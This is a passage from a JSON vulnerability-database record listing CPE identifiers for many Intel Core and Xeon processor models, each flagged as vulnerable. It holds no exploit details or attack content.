"cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l3406:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5549:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5503:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5502:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5667:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5618:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5609:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5649:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5603:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x6550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l7545:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3440:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5528:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w5580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5509:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5507:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5677:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5647:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5630:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5620:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1505m_v6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1575m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1565l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1271_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1231_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e-1105c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1515m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1278l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1281_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1246_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1226_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699r_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4648_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4657l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3470:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1105c_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699a_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 